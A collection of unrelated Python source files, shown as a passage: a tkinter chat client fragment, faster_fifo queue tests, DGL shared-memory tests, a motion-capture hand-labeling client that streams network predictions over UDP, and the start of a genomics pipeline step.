self.sendBtn.pack()
def send(self):
senddata = self.entry.get()
s.send(senddata.encode())
def createGUI():
global gui
root = Tk()
gui = GUI(root)
root.title('Client Text')
root.mainloop()
if __name__ == '__main__':
t1 = threading.Thread(target=recv, args=(), name='recv')
t2 = threading.Thread(target=createGUI, args=(), name='gui')
t1.start()
t2.start()
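# Note: this client assumes a chat/echo-style TCP server is already listening
# at the address/port configured above; start that server first, then run this
# script to connect, type a message, and watch replies appear in the listbox.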
|
manual_control_test.py
|
import random
import threading
import time
def inp_handler(name):
from pynput.keyboard import Controller as KeyboardController
from pynput.keyboard import Key
keyboard = KeyboardController()
time.sleep(0.1)
choices = ["w", "a", "s", "d", "j", "k", Key.left, Key.right, Key.up, Key.down]
NUM_TESTS = 50
for x in range(NUM_TESTS):
i = random.choice(choices) if x != NUM_TESTS - 1 else Key.esc
keyboard.press(i)
time.sleep(0.1)
keyboard.release(i)
def manual_control_test(manual_control):
manual_in_thread = threading.Thread(target=inp_handler, args=(1,))
manual_in_thread.start()
    try:
        manual_control()
    except Exception as e:
        raise Exception("manual_control() has crashed. Please fix it.") from e
manual_in_thread.join()
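# Sketch of how this helper might be driven (the module and function names
# below are placeholders, not part of this file):
#
#     from my_env import manual_control   # hypothetical import
#     manual_control_test(manual_control)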
|
test_faster_fifo.py
|
import logging
import multiprocessing
from queue import Full, Empty
from unittest import TestCase
from faster_fifo import Queue
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log = logging.getLogger('rl')
log.setLevel(logging.DEBUG)
log.handlers = [] # No duplicated handlers
log.propagate = False # workaround for duplicated logs in ipython
log.addHandler(ch)
MSG_SIZE = 5
# I think we don't need this anymore (check!)
# if sys.version_info >= (3, 8) and sys.platform == 'darwin':
# multiprocessing.set_start_method('fork')
def make_msg(msg_idx):
return (msg_idx,) * MSG_SIZE
def produce(q, p_idx, num_messages):
i = 0
while i < num_messages:
try:
q.put(make_msg(i), timeout=0.01)
if i % 50000 == 0:
log.info('Produce: %d %d', i, p_idx)
i += 1
except Full:
# time.sleep(0.001)
pass
except Exception as exc:
log.exception(exc)
log.info('Done! %d', p_idx)
def consume(q, p_idx, consume_many, total_num_messages=int(1e9)):
messages_received = 0
while True:
try:
msgs = q.get_many(timeout=0.01, max_messages_to_get=consume_many)
for msg in msgs:
messages_received += 1
if msg[0] % 50000 == 0:
log.info('Consume: %r %d num_msgs: %d', msg, p_idx, len(msgs))
if messages_received >= total_num_messages:
break
except Empty:
if q.is_closed():
break
except Exception as exc:
log.exception(exc)
log.info('Done! %d', p_idx)
class TestFastQueue(TestCase):
def test_singleproc(self):
q = Queue()
produce(q, 0, num_messages=20)
consume(q, 0, consume_many=2, total_num_messages=20)
q.close()
def test_multiproc(self):
q = Queue()
consume_many = 1000
producers = []
consumers = []
for j in range(20):
p = multiprocessing.Process(target=produce, args=(q, j, 1000001))
producers.append(p)
for j in range(3):
p = multiprocessing.Process(target=consume, args=(q, j, consume_many))
consumers.append(p)
for c in consumers:
c.start()
for p in producers:
p.start()
for p in producers:
p.join()
q.close()
for c in consumers:
c.join()
log.info('Exit...')
def test_msg(self):
q = Queue(max_size_bytes=1000)
py_obj = dict(a=42, b=33, c=(1, 2, 3), d=[1, 2, 3], e='123', f=b'kkk')
q.put_nowait(py_obj)
res = q.get_nowait()
log.debug('Got object %r', res)
self.assertEqual(py_obj, res)
def test_queue_size(self):
q = Queue(max_size_bytes=1000)
py_obj_1 = dict(a=10, b=20)
py_obj_2 = dict(a=30, b=40)
q.put_nowait(py_obj_1)
q.put_nowait(py_obj_2)
q_size_bef = q.qsize()
log.debug('Queue size after put - %d', q_size_bef)
num_messages = 0
want_to_read = 2
while num_messages < want_to_read:
msgs = q.get_many()
print(msgs)
num_messages += len(msgs)
self.assertEqual(type(q_size_bef), int)
q_size_af = q.qsize()
log.debug('Queue size after get - %d', q_size_af)
self.assertEqual(q_size_af, 0)
def test_queue_empty(self):
q = Queue(max_size_bytes=1000)
self.assertTrue(q.empty())
py_obj = dict(a=42, b=33, c=(1, 2, 3), d=[1, 2, 3], e='123', f=b'kkk')
q.put_nowait(py_obj)
q_empty = q.empty()
self.assertFalse(q_empty)
def test_queue_full(self):
q = Queue(max_size_bytes=60)
self.assertFalse(q.full())
py_obj = (1, 2)
while True:
try:
q.put_nowait(py_obj)
except Full:
self.assertTrue(q.full())
break
def test_queue_usage(self):
q = Queue(1000 * 1000) # specify the size of the circular buffer in the ctor
# any pickle-able Python object can be added to the queue
py_obj = dict(a=42, b=33, c=(1, 2, 3), d=[1, 2, 3], e='123', f=b'kkk')
q.put(py_obj)
assert q.qsize() == 1
retrieved = q.get()
assert q.empty()
assert py_obj == retrieved
for i in range(100):
try:
q.put(py_obj, timeout=0.1)
except Full:
log.debug('Queue is full!')
num_received = 0
while num_received < 100:
# get multiple messages at once, returns a list of messages for better performance in many-to-few scenarios
# get_many does not guarantee that all max_messages_to_get will be received on the first call, in fact
# no such guarantee can be made in multiprocessing systems.
# get_many() will retrieve as many messages as there are available AND can fit in the pre-allocated memory
# buffer. The size of the buffer is increased gradually to match demand.
messages = q.get_many(max_messages_to_get=100)
num_received += len(messages)
try:
q.get(timeout=0.1)
            assert False, 'This should not be reached; the queue is empty so get() raises Empty'
except Empty:
log.debug('Queue is empty')
def spawn_producer(data_q_):
for i in range(10):
data = [1, 2, 3, i]
data_q_.put(data)
def spawn_consumer(data_q_):
i = 0
while True:
try:
data = data_q_.get(timeout=0.5)
print(data)
i += 1
except Empty:
print('Read', i, 'messages')
break
class TestSpawn(TestCase):
def test_spawn_ctx(self):
ctx = multiprocessing.get_context('spawn')
data_q = Queue(1000 * 1000)
procs = [
ctx.Process(target=spawn_producer, args=(data_q,)) for _ in range(2)
]
procs.append(ctx.Process(target=spawn_consumer, args=(data_q,)))
for p in procs:
p.start()
for p in procs:
p.join()
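# These TestCase classes can be run with the standard unittest runner, e.g.:
#
#     python -m unittest test_faster_fifo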
|
action.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2016 kirmani <sean@kirmani.io>
#
# Distributed under terms of the MIT license.
"""
Action.
"""
from multiprocessing import Process
import os
import signal
class Action:
def __init__(self, name, entities, preconditions, postconditions):
self.name = name
self.entities = entities
self.preconditions = preconditions
self.postconditions = postconditions
self.process_ = Process(target = self.TaskWrapper_)
self.on_interrupt_ = None
def Task(self):
pass
def Start(self):
self.process_.start()
def Interrupt(self):
os.killpg(os.getpgid(self.process_.pid), signal.SIGTERM)
if (self.on_interrupt_):
self.on_interrupt_(self)
def OnInterrupt(self, func):
self.on_interrupt_ = func
def IsFinished(self):
return not self.process_.is_alive()
def TaskWrapper_(self):
os.setpgid(os.getpid(), os.getpid())
self.Task()
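# A minimal usage sketch (the Wait subclass below is illustrative, not part of
# this module):
#
#     import time
#
#     class Wait(Action):
#         def __init__(self):
#             Action.__init__(self, 'wait', [], {}, {})
#         def Task(self):
#             time.sleep(1)
#
#     a = Wait()
#     a.Start()
#     while not a.IsFinished():
#         time.sleep(0.1)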
|
test_shared_mem_store.py
|
import dgl
import sys
import random
import time
import numpy as np
from multiprocessing import Process
from scipy import sparse as spsp
import mxnet as mx
import backend as F
import unittest
import dgl.function as fn
num_nodes = 100
num_edges = int(num_nodes * num_nodes * 0.1)
rand_port = random.randint(5000, 8000)
print('run graph store with port ' + str(rand_port), file=sys.stderr)
def check_array_shared_memory(g, worker_id, arrays):
if worker_id == 0:
for i, arr in enumerate(arrays):
arr[0] = i
g._sync_barrier()
else:
g._sync_barrier()
for i, arr in enumerate(arrays):
assert np.all(arr[0].asnumpy() == i)
def check_init_func(worker_id, graph_name):
time.sleep(3)
print("worker starts")
np.random.seed(0)
csr = (spsp.random(num_nodes, num_nodes, density=0.1, format='csr') != 0).astype(np.int64)
g = dgl.contrib.graph_store.create_graph_from_store(graph_name, "shared_mem", port=rand_port)
# Verify the graph structure loaded from the shared memory.
src, dst = g.all_edges()
coo = csr.tocoo()
assert F.array_equal(dst, F.tensor(coo.row))
assert F.array_equal(src, F.tensor(coo.col))
assert F.array_equal(g.nodes[0].data['feat'], F.tensor(np.arange(10), dtype=np.float32))
assert F.array_equal(g.edges[0].data['feat'], F.tensor(np.arange(10), dtype=np.float32))
g.init_ndata('test4', (g.number_of_nodes(), 10), 'float32')
g.init_edata('test4', (g.number_of_edges(), 10), 'float32')
g._sync_barrier()
check_array_shared_memory(g, worker_id, [g.nodes[:].data['test4'], g.edges[:].data['test4']])
data = g.nodes[:].data['test4']
g.set_n_repr({'test4': mx.nd.ones((1, 10)) * 10}, u=[0])
assert np.all(data[0].asnumpy() == g.nodes[0].data['test4'].asnumpy())
data = g.edges[:].data['test4']
g.set_e_repr({'test4': mx.nd.ones((1, 10)) * 20}, edges=[0])
assert np.all(data[0].asnumpy() == g.edges[0].data['test4'].asnumpy())
g.destroy()
def server_func(num_workers, graph_name):
print("server starts")
np.random.seed(0)
csr = (spsp.random(num_nodes, num_nodes, density=0.1, format='csr') != 0).astype(np.int64)
g = dgl.contrib.graph_store.create_graph_store_server(csr, graph_name, "shared_mem", num_workers,
False, edge_dir="in", port=rand_port)
assert num_nodes == g._graph.number_of_nodes()
assert num_edges == g._graph.number_of_edges()
g.ndata['feat'] = mx.nd.arange(num_nodes * 10).reshape((num_nodes, 10))
g.edata['feat'] = mx.nd.arange(num_edges * 10).reshape((num_edges, 10))
g.run()
def test_init():
serv_p = Process(target=server_func, args=(2, 'test_graph1'))
work_p1 = Process(target=check_init_func, args=(0, 'test_graph1'))
work_p2 = Process(target=check_init_func, args=(1, 'test_graph1'))
serv_p.start()
work_p1.start()
work_p2.start()
serv_p.join()
work_p1.join()
work_p2.join()
def check_compute_func(worker_id, graph_name):
time.sleep(3)
print("worker starts")
g = dgl.contrib.graph_store.create_graph_from_store(graph_name, "shared_mem", port=rand_port)
g._sync_barrier()
in_feats = g.nodes[0].data['feat'].shape[1]
# Test update all.
g.update_all(fn.copy_src(src='feat', out='m'), fn.sum(msg='m', out='preprocess'))
adj = g.adjacency_matrix()
tmp = mx.nd.dot(adj, g.nodes[:].data['feat'])
assert np.all((g.nodes[:].data['preprocess'] == tmp).asnumpy())
g._sync_barrier()
check_array_shared_memory(g, worker_id, [g.nodes[:].data['preprocess']])
# Test apply nodes.
data = g.nodes[:].data['feat']
g.apply_nodes(func=lambda nodes: {'feat': mx.nd.ones((1, in_feats)) * 10}, v=0)
assert np.all(data[0].asnumpy() == g.nodes[0].data['feat'].asnumpy())
# Test apply edges.
data = g.edges[:].data['feat']
g.apply_edges(func=lambda edges: {'feat': mx.nd.ones((1, in_feats)) * 10}, edges=0)
assert np.all(data[0].asnumpy() == g.edges[0].data['feat'].asnumpy())
g.init_ndata('tmp', (g.number_of_nodes(), 10), 'float32')
data = g.nodes[:].data['tmp']
# Test pull
g.pull(1, fn.copy_src(src='feat', out='m'), fn.sum(msg='m', out='tmp'))
assert np.all(data[1].asnumpy() == g.nodes[1].data['preprocess'].asnumpy())
# Test send_and_recv
in_edges = g.in_edges(v=2)
g.send_and_recv(in_edges, fn.copy_src(src='feat', out='m'), fn.sum(msg='m', out='tmp'))
assert np.all(data[2].asnumpy() == g.nodes[2].data['preprocess'].asnumpy())
g.destroy()
def test_compute():
serv_p = Process(target=server_func, args=(2, 'test_graph3'))
work_p1 = Process(target=check_compute_func, args=(0, 'test_graph3'))
work_p2 = Process(target=check_compute_func, args=(1, 'test_graph3'))
serv_p.start()
work_p1.start()
work_p2.start()
serv_p.join()
work_p1.join()
work_p2.join()
if __name__ == '__main__':
test_init()
test_compute()
|
LabelingClient.py
|
import sys
import threading
from NatNetClient import NatNetClient
import numpy as np
import math
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
import socket
import struct
import queue as queue
import time
# performs all processing and runs the neural network
# the labeled data is streamed to outputIP at outputPort
class ThreadedWorker(object):
resolutionPcm = 4
resolutionPmm = resolutionPcm / 10
# image size in cm
imageSize = 25
# max y in mm
ultimateY = 120
# number of pixels
nop = imageSize * resolutionPcm
# center point in image
zzz = [nop / 2, 0, nop - (8 * resolutionPcm)]
q = queue.LifoQueue(maxsize=0)
logged = False
outputPort = 1512
outputSocket = None
tfDevice = '/cpu:0'
config = tf.ConfigProto(log_device_placement=False, allow_soft_placement=True)
inputTensor = None
outputTensor = None
sess = None
markerLabels = None
rShapesAreStreamed = True
lastRData = np.array([[0,0,0], [0,0,0], [0,0,0], [0,0,0], [0,0,0], [0,0,0], [0,0,0], [0,0,0]], dtype='f')
lastTimeStep = None
maxTimeBetweenRFrames = 0.5 #0.004 * 3
maxLegalDistForRs = 0.006
# delta for R_Shape detection
delta = 0.00475
# R_Shape distances
d12 = 0.04067110384179894
d13 = 0.03997714900977185
d14 = 0.014055661378941353
d23 = 0.02587136293308418
d24 = 0.047480735670875227
d34 = 0.03835638333555752
# load the graph of the neural network from a .pb file
def load_graph(self, frozen_graph_filename):
with tf.gfile.GFile(frozen_graph_filename, "rb") as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
with tf.Graph().as_default() as graph:
tf.import_graph_def(
graph_def,
input_map=None,
return_elements=None,
name="prefix",
op_dict=None,
producer_op_list=None
)
return graph
def __init__(self, interval=1):
self.interval = interval
print("loading tensorflow", tf.__version__)
self.outputSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
print("loading neural network")
with tf.device(self.tfDevice):
graph = self.load_graph("./labelNetwork.pb")
# We access the input and output nodes
self.inputTensor = graph.get_tensor_by_name('prefix/conv2d_1_input:0')
self.outputTensor = graph.get_tensor_by_name('prefix/output_node0:0')
self.sess = tf.Session(graph=graph, config=self.config)
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
def normalizeY(self, coordinates):
yt = coordinates[1::3]
yt = (yt / self.ultimateY)
coordinates[1::3] = yt
return coordinates
# filter data which is outside the depth image bounds
def filterData(self, coordinates, transformedAndShiftedData): # coordinates in mm
# filter coordinates and apply the same filter to transformedAndShiftedData
xt = coordinates[0::3]
yt = coordinates[1::3]
zt = coordinates[2::3]
xtas = transformedAndShiftedData[0::3]
ytas = transformedAndShiftedData[1::3]
ztas = transformedAndShiftedData[2::3]
xtAfterFilter = []
ytAfterFilter = []
ztAfterFilter = []
xTransformedAndShiftedDataOutput = []
yTransformedAndShiftedDataOutput = []
zTransformedAndShiftedDataOutput = []
for i in range(len(xt)):
# if the data is outside the grid size it does not belong to the hand
if xt[i] < 0 or xt[i] >= self.nop or zt[i] < 0 or zt[i] >= self.nop or yt[i] < -self.ultimateY or yt[
i] > self.ultimateY:
continue
xtAfterFilter.append(xt[i])
ytAfterFilter.append(yt[i])
ztAfterFilter.append(zt[i])
xTransformedAndShiftedDataOutput.append(xtas[i])
yTransformedAndShiftedDataOutput.append(ytas[i])
zTransformedAndShiftedDataOutput.append(ztas[i])
cNew = np.array([xtAfterFilter, ytAfterFilter, ztAfterFilter])
cNew = cNew.T.reshape(-1)
tasNew = np.array(
[xTransformedAndShiftedDataOutput, yTransformedAndShiftedDataOutput, zTransformedAndShiftedDataOutput])
tasNew = tasNew.T.reshape(-1)
return {"coordinates": cNew, "transformedAndShiftedData": tasNew}
# create depth image of size nop x nop
def createImage(self, coordinates): # coordinates in mm
image = np.zeros((1, self.nop, self.nop, 1))
coordinatesF = coordinates # still floats
coordinates = coordinates.astype(np.int)
for j in range(0, coordinates.shape[0]):
# x z plane image with y value
            image[0][coordinates[j][0]][coordinates[j][2]][0] = coordinatesF[j][1]  # y values are normalized
return image
def unit_vector(self, vector):
return vector / np.linalg.norm(vector)
# perform transformation to hand coordinates by calculating new basis and performing change of basis
def transformToHandCoordinates(self, rs, data):
r1 = rs[0]
r2 = rs[1]
r3 = rs[2]
r4 = rs[3]
m12 = np.array([(r1[0] + r2[0]) / 2, (r1[1] + r2[1]) / 2, (r1[2] + r2[2]) / 2])
m14 = np.array([(r1[0] + r4[0]) / 2, (r1[1] + r4[1]) / 2, (r1[2] + r4[2]) / 2])
m23 = np.array([(r3[0] + r2[0]) / 2, (r3[1] + r2[1]) / 2, (r3[2] + r2[2]) / 2])
m34 = np.array([(r3[0] + r4[0]) / 2, (r3[1] + r4[1]) / 2, (r3[2] + r4[2]) / 2])
# find three linear independent vectors vx, vy, vz
vx = self.unit_vector(m23 - m14)
vy = self.unit_vector(np.cross(vx, (m12 - m34)))
vz = self.unit_vector(np.cross(vx, vy))
baseOld = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]]).T
baseNew = np.array([vx, vy, vz]).T
cob = np.linalg.solve(baseNew, baseOld)
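        # note: baseOld is the identity, so cob = inv(baseNew); because vx, vy,
        # vz are orthonormal this is simply baseNew.T, and multiplying by it
        # re-expresses the marker data in the hand-centred coordinate frame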
rotated = np.dot(cob, data.T)
return {"rotated": rotated.T, "rotationMatrix": cob}
def getDistanceNP(self, marker, data):
return np.sqrt(np.sum(np.square(np.subtract(data, marker)), axis=1))
def getDistanceNP2(self, data0, data1):
return np.sqrt(np.sum(np.square(np.subtract(data0, data1))))
def run(self):
while True:
##########################################
####### Receive Data From Listener #######
##########################################
# get first element of the queue and clear queue to minimize delay
data = self.q.get()
with self.q.mutex:
self.q.queue.clear()
if not self.logged:
print("Receiving Frame Data, Running Neural Network and Streaming Labeled Data to", outputIP)
self.logged = True
frame = {}
for i in range(len(self.markerLabels)):
frame[self.markerLabels[i]] = data[i]
for i in range(len(self.markerLabels), len(data)):
frame["Unlabeled_" + str(i - len(self.markerLabels))] = data[i]
################################################
####### Rigid Body Detection/ Extraction #######
################################################
rs = {}
timestep = time.time()
            # can the last R_Shapes still be tracked, or do we have to rerun the detection?
doFindNewRS = True
if ((not self.lastTimeStep == None) and timestep <= self.lastTimeStep + self.maxTimeBetweenRFrames and timestep >= self.lastTimeStep):
dataNP = np.array(data)
doFindNewRS = False
# try to track the last R_Shapes by finding the nearest neighbors
rmseList = [float("inf")] * self.lastRData.shape[0]
indexList = [-1] * self.lastRData.shape[0]
queue = list(range(self.lastRData.shape[0]))
while len(queue) > 0:
i = queue.pop(0)
candidate = self.lastRData[i]
dist = np.array(
[dataNP[:, 0] - candidate[0], dataNP[:, 1] - candidate[1], dataNP[:, 2] - candidate[2]])
dist = dist.T
dist = np.sqrt(np.mean(np.square(dist), axis=1))
minI = np.argmin(dist, axis=0)
foundNN = False
while not foundNN:
                        # if all distances are inf, every data point is already assigned to a closer neighbour
if dist[i] == float("inf"):
break
# if there is no label found yet for the nearest neighbor we found one
if indexList[i] == -1:
indexList[i] = minI
rmseList[i] = dist[minI]
foundNN = True
# if the new candidate is closer than the previous nearest neighbor, set it as nn and run the other one again
elif rmseList[i] > dist[minI]:
queue.append(indexList[i])
indexList[i] = minI
rmseList[i] = dist[minI]
foundNN = True
# if there is already another marker closer to the R, set its distance to inf and find the 2nd nearest neighbor
else:
dist[minI] = float("inf")
minI = np.argmin(dist, axis=0)
# Check for max distance, if they are too distant we have to rerun the R_Shape detection
if not (all(i <= self.maxLegalDistForRs for i in rmseList)):
doFindNewRS = True
# save last R data for the next run
self.lastRData = dataNP[indexList]
if doFindNewRS:
rCandidates = []
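                # Brute-force search: try every ordered marker quadruple (r1, r2, r3, r4) and
                # keep those whose six pairwise distances match the known R_Shape geometry
                # (d12, d13, d14, d23, d24, d34) within +/- delta.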
for indexR1, r1c in enumerate(data):
distances = self.getDistanceNP(r1c, data)
f1 = distances[distances >= self.d14 - self.delta]
if len(f1[f1 <= self.d24 + self.delta]) < 3:
continue
# find candidates for r4
for indexR4, r4c in enumerate(data):
distanceR14 = distances[indexR4]
if (distanceR14 >= self.d14 - self.delta) and (distanceR14 <= self.d14 + self.delta):
# find candidates for r2
for indexR2, r2c in enumerate(data):
if not ((distances[indexR2] >= self.d12 - self.delta) and (
distances[indexR2] <= self.d12 + self.delta)):
continue
distanceR24 = self.getDistanceNP2(r4c, r2c)
if (distanceR24 >= self.d24 - self.delta) and (distanceR24 <= self.d24 + self.delta):
# find candidates for r3
for indexR3, r3c in enumerate(data):
if not ((distances[indexR3] >= self.d13 - self.delta) and (
distances[indexR3] <= self.d13 + self.delta)):
continue
distanceR23 = self.getDistanceNP2(r2c, r3c)
if (distanceR23 >= self.d23 - self.delta) and (distanceR23 <= self.d23 + self.delta):
# verify by checking the other distances
distanceR34 = self.getDistanceNP2(r3c, r4c)
if (distanceR34 >= self.d34 - self.delta) and (distanceR34 <= self.d34 + self.delta):
rCandidates.append(data[indexR1])
rCandidates.append(data[indexR2])
rCandidates.append(data[indexR3])
rCandidates.append(data[indexR4])
self.lastRData = np.array(rCandidates)
self.lastTimeStep = time.time()
for i in range(int(self.lastRData.shape[0] / 4)):
rs["r" + str(len(rs))] = [self.lastRData[i * 4 + 0], self.lastRData[i * 4 + 1], self.lastRData[i * 4 + 2], self.lastRData[i * 4 + 3]]
frameList = list(frame.values())
##################################
####### Filter by Distance #######
##################################
images = np.array([])
transformedAndShiftedDataMemory = []
rotationResultMemory = []
rcenterMemory = []
for i in range(len(rs)):
rshape = rs["r" + str(i)]
# find the center of the R_Shape
rcenter = [(rshape[0][0] + rshape[1][0] + rshape[2][0] + rshape[3][0]) / 4,
(rshape[0][1] + rshape[1][1] + rshape[2][1] + rshape[3][1]) / 4,
(rshape[0][2] + rshape[1][2] + rshape[2][2] + rshape[3][2]) / 4]
                # data for the neural network's grid: excludes the R_Shape markers themselves and any markers too far away from the R_Shape
dataForGrid = []
# remove rs itself
for j in range(len(frameList)):
                    if any(frameList[j][0] == r[0] and frameList[j][1] == r[1] and frameList[j][2] == r[2]
                           for r in rshape):
                        continue
# filter by distance to remove markers that are too far away from R_Shape
                    # 0.212 m distance is too far away
if math.sqrt((rcenter[0] - frameList[j][0]) ** 2 +
(rcenter[1] - frameList[j][1]) ** 2 +
(rcenter[2] - frameList[j][2]) ** 2) >= 0.212:
continue
###################################
####### Shift to new Center #######
###################################
# shift data to new basis center
shifted = [frameList[j][0] - rcenter[0], frameList[j][1] - rcenter[1],
frameList[j][2] - rcenter[2]]
dataForGrid.append(shifted)
# shift R to new basis center
rzero = [[rshape[0][0] - rcenter[0], rshape[0][1] - rcenter[1], rshape[0][2] - rcenter[2]],
[rshape[1][0] - rcenter[0], rshape[1][1] - rcenter[1], rshape[1][2] - rcenter[2]],
[rshape[2][0] - rcenter[0], rshape[2][1] - rcenter[1], rshape[2][2] - rcenter[2]],
[rshape[3][0] - rcenter[0], rshape[3][1] - rcenter[1], rshape[3][2] - rcenter[2]]]
#############################################
####### Transform to hand coordinates #######
#############################################
# transform to hand coordinates
npData = np.array(dataForGrid)
if npData.shape[0] == 0:
continue
rotationResult = self.transformToHandCoordinates(rzero, npData)
dataForGrid = rotationResult["rotated"]
                # keep a copy in meters, independent of the image resolution, for the nearest-neighbour search after the neural network has run
transformedAndShiftedData = dataForGrid.reshape(-1)
# from meter to millimeter
dataForGrid = dataForGrid * 1000
#########################################################
####### Create Depth Image for the Neural Network #######
#########################################################
# from millimeter to image resolution and centered to the image center 'zzz'
dataForGrid = (dataForGrid * self.resolutionPmm) + self.zzz
# reshape for further processing
dataForGrid = dataForGrid.reshape(-1)
# remove resolutionPmm from y again, it will be normalized to [-1,1]
yt = dataForGrid[1::3]
yt = (yt / self.resolutionPmm)
dataForGrid[1::3] = yt
# filter by distance to remove markers that are too far away from R_Shape
filterResult = self.filterData(dataForGrid, transformedAndShiftedData)
dataForGrid = filterResult["coordinates"]
transformedAndShiftedData = filterResult["transformedAndShiftedData"]
# normalize y
dataForGrid = self.normalizeY(dataForGrid)
# reshape again
dataForGrid = dataForGrid.reshape(-1, 3)
transformedAndShiftedData = transformedAndShiftedData.reshape(-1, 3)
# create image for NN
image = self.createImage(dataForGrid)
if images.shape[0] == 0:
images = image
else:
images = np.append(images, image, axis=0)
transformedAndShiftedDataMemory.append(transformedAndShiftedData)
rotationResultMemory.append(rotationResult)
rcenterMemory.append(rcenter)
if images.shape[0] == 0:
continue
#####################################
            ####### Run the Neural Network ######
#####################################
pred_y_all = self.sess.run(self.outputTensor, feed_dict={self.inputTensor: images})
for hand in range(pred_y_all.shape[0]):
pred_y = pred_y_all[hand]
transformedAndShiftedData = transformedAndShiftedDataMemory[hand]
rotationResult = rotationResultMemory[hand]
rcenter = rcenterMemory[hand]
#########################################################
####### Find the Nearest Neighbors for the Labels #######
#########################################################
# get labels from neural network by nearest neighbour
prediction = np.array(pred_y)
# change to meter again
prediction = prediction / 1000
prediction = prediction.reshape(21, 2)
# save the indices of the nearest neighbors and their distances
rmseList = [float("inf")] * 21
indexList = [-1] * 21
# find the nearest candidate for each label prediction
queue = list(range(transformedAndShiftedData.shape[0]))
while len(queue) > 0:
i = queue.pop(0)
candidate = transformedAndShiftedData[i]
dist = np.array([prediction[:, 0] - candidate[0], prediction[:, 1] - candidate[2]])
dist = dist.T
dist = np.sqrt(np.mean(np.square(dist), axis=1))
minI = np.argmin(dist, axis=0)
foundNN = False
while not foundNN:
                        # if all distances are inf, all data is labeled to closer neighbors
if dist[minI] == float("inf"):
break
# if there is no label found yet for the nearest neighbor we found one
if indexList[minI] == -1:
indexList[minI] = i
rmseList[minI] = dist[minI]
foundNN = True
# if the new candidate is closer than the previous nearest neighbor, set it as nn and run the other one again
elif rmseList[minI] > dist[minI]:
queue.append(indexList[minI])
indexList[minI] = i
rmseList[minI] = dist[minI]
foundNN = True
# if there is already another marker closer to the nearest label, set its distance to inf and find the 2nd nearest neighbor
else:
dist[minI] = float("inf")
minI = np.argmin(dist, axis=0)
# set the coordinates of the labeled markers, if there is not a candidate for each label, set its coordinates to (0, 0, 0)
labeledList = np.zeros((21, 3))
indexList = np.array(indexList)
indexListSetOn = np.where(indexList >= 0)
labeledList[indexListSetOn] = transformedAndShiftedData[indexList[indexListSetOn]]
####################################################################
####### Classify whether the data is left or right hand data #######
####################################################################
# is left or right hand?
# the thumb mcp of right hand data has negative y value
isRightHand = float(0)
if labeledList[3, 1] < 0:
isRightHand = float(1)
#############################################################
####### Transform and shift back to world coordinates #######
#############################################################
labeledList = np.dot(np.linalg.inv(rotationResult["rotationMatrix"]),
labeledList.T).T
labeledList = labeledList + rcenter
labeledList = list(labeledList.reshape(-1))
####################################################
####### Stream the Labeled Data to Output IP #######
####################################################
# add whether data is right handed or not
labeledList.insert(0, isRightHand)
# stream to unity
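                # Packet layout (as derived from the code above, not an official spec):
                # 1 + 21*3 = 64 native-endian 32-bit floats -- the right-hand flag followed by
                # the 21 labeled joint positions in world coordinates -- sent as one UDP datagram.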
buf = struct.pack('%sf' % len(labeledList), *labeledList)
self.outputSocket.sendto(buf, (outputIP, self.outputPort))
# receives the marker definition and saves the marker labels
def markerDefinitionListener(markerSetName, names):
if markerSetName == "all":
print("marker definition received")
removePrefix = (lambda x: str(x).split(":")[1] if len(str(x).split(":")) > 1 else str(x))
# remove "all:" from marker labels
for i in range(len(names)):
names[i] = removePrefix(names[i])
worker.markerLabels = names
# receives the marker data, and pass to worker thread
def markerDataListener(data):
worker.q.put(data)
# This will create a new NatNet client
streamingClient = NatNetClient()
streamingClient.markerDefinitionListener = markerDefinitionListener
streamingClient.markerDataListener = markerDataListener
worker = ThreadedWorker()
print("==========================================================================")
outputIP = "192.168.56.1"
if len(sys.argv) > 1:
streamingClient.serverIPAddress = sys.argv[1]
if len(sys.argv) > 2:
outputIP = sys.argv[2]
if len(sys.argv) > 3:
if sys.argv[3] == "gpu":
worker.tfDevice = '/gpu:0'
worker.config = tf.ConfigProto(log_device_placement=False, allow_soft_placement=True, device_count={'GPU': 4})
print("Using Device " + worker.tfDevice)
else:
print("No Motive IP or Output IP was given. Run with parameters to hand over IPs! Run for Example:")
print("sudo python3 LabelingClient.py <motiveIP> <outputIP>")
print("sudo python3 LabelingClient.py 192.168.56.1 192.168.56.1")
print("==========================================================================")
print("Motive IP", streamingClient.serverIPAddress)
print("Output IP", outputIP)
print("==========================================================================")
print("starting natnet streaming client")
streamingClient.run()
|
generate_alignment_viz.py
|
import json
import os
import re
import time
import traceback
from collections import defaultdict
import subprocess
import threading
from idseq_dag.engine.pipeline_step import PipelineStep
from idseq_dag.util.lineage import INVALID_CALL_BASE_ID
import idseq_dag.util.log as log
import idseq_dag.util.command as command
import idseq_dag.util.s3 as s3
from idseq_dag.util.dict import IdSeqDictValue, open_file_db_by_extension
class PipelineStepGenerateAlignmentViz(PipelineStep):
"""Pipeline step to generate JSON file for read alignment visualizations to
be consumed by the web app.
"""
def count_reads(self):
pass
REF_DISPLAY_RANGE = 100
MAX_SEQ_DISPLAY_SIZE = 6000
def run(self):
# Setup
nt_db = self.additional_attributes["nt_db"]
nt_loc_db = s3.fetch_reference(
self.additional_files["nt_loc_db"],
self.ref_dir_local,
auto_unzip=True, # This is default for reference download, just being explicit.
allow_s3mi=True)
db_type = "nt" # Only NT supported for now
# TODO: Design a way to map in/out files more robustly, e.g. by name/type
annotated_m8 = self.input_files_local[0][0]
annotated_fasta = self.input_files_local[1][0]
output_json_dir = os.path.join(self.output_dir_local, "align_viz")
# Go through annotated_fasta with a db_type (NT/NR match). Infer the
# family/genus/species info
read2seq = PipelineStepGenerateAlignmentViz.parse_reads(
annotated_fasta, db_type)
log.write(f"Read to Seq dictionary size: {len(read2seq)}")
groups, line_count = self.process_reads_from_m8_file(
annotated_m8, read2seq)
        # If nt_db has not been downloaded yet, download it here
if nt_db.startswith("s3://"):
# TODO: Handle this better. We might be poorly provisioned to allow s3mi speed
# for this step, on the instance where it is running.
nt_db = s3.fetch_reference(
nt_db,
self.ref_dir_local,
                auto_unzip=True, # this is default for reference downloads, just being explicit
allow_s3mi=True) # s3mi probably okay here because we tend to download only NT and little else in this stage
